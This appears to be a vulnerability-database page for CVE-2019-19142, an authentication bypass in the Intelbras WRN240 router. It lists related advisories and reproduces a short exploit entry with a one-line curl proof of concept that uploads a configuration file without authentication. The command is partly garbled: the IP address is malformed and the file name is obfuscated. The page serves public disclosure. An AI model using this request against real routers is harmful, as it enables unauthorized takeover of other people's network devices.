Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload) Vulnerability

🗓️ 02 Mar 2020 00:00:00Reported by Elber TavaresType

zdt🔗 0day.today👁 114 Views

Intelbras Wireless WRN240 Vulnerability – Authentication Bypas

Reporter	Title	Published	Views	Family All 12
CNVD	Unspecified Vulnerability in Intelbras WRN240	19 Jan 202000:00	–	cnvd
Check Point Advisories	Intelbras Wireless N Authentication Bypass (CVE-2019-19142)	21 Nov 202000:00	–	checkpoint_advisories
CVE	CVE-2019-19142	17 Jan 202001:29	–	cve
Cvelist	CVE-2019-19142	17 Jan 202001:29	–	cvelist
Exploit DB	Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)	2 Mar 202000:00	–	exploitdb
exploitpack	Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)	2 Mar 202000:00	–	exploitpack
NVD	CVE-2019-19142	17 Jan 202002:15	–	nvd
OSV	CVE-2019-19142	17 Jan 202002:15	–	osv
Packet Storm	Intelbras Wireless N 150Mbps WRN240 Authentication Bypass	2 Mar 202000:00	–	packetstorm
Prion	Authentication flaw	17 Jan 202002:15	–	prion

# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
# Exploit Author: Elber Tavares
# Vendor Homepage:  https://www.intelbras.com/
# Software Link:  http://en.intelbras.com.br/node/1033
# Version: Intelbras Wireless N 150Mbps - WRN240
# Tested on: linux, windows
# CVE: CVE-2019-19142

Intelbras WRN240 devices do not require authentication to replace the
firmware via a POST request to the incoming/Firmware.cfg URI.

REFS:
 https://fireshellsecurity.team/hack-n-routers/
 https://github.com/ElberTavares/routers-exploit/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F [email protected]
http://192.1680.1/incoming/RouterBakCfgUpload.cfg

#  0day.today [2020-03-04]  #

02 Mar 2020 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.0781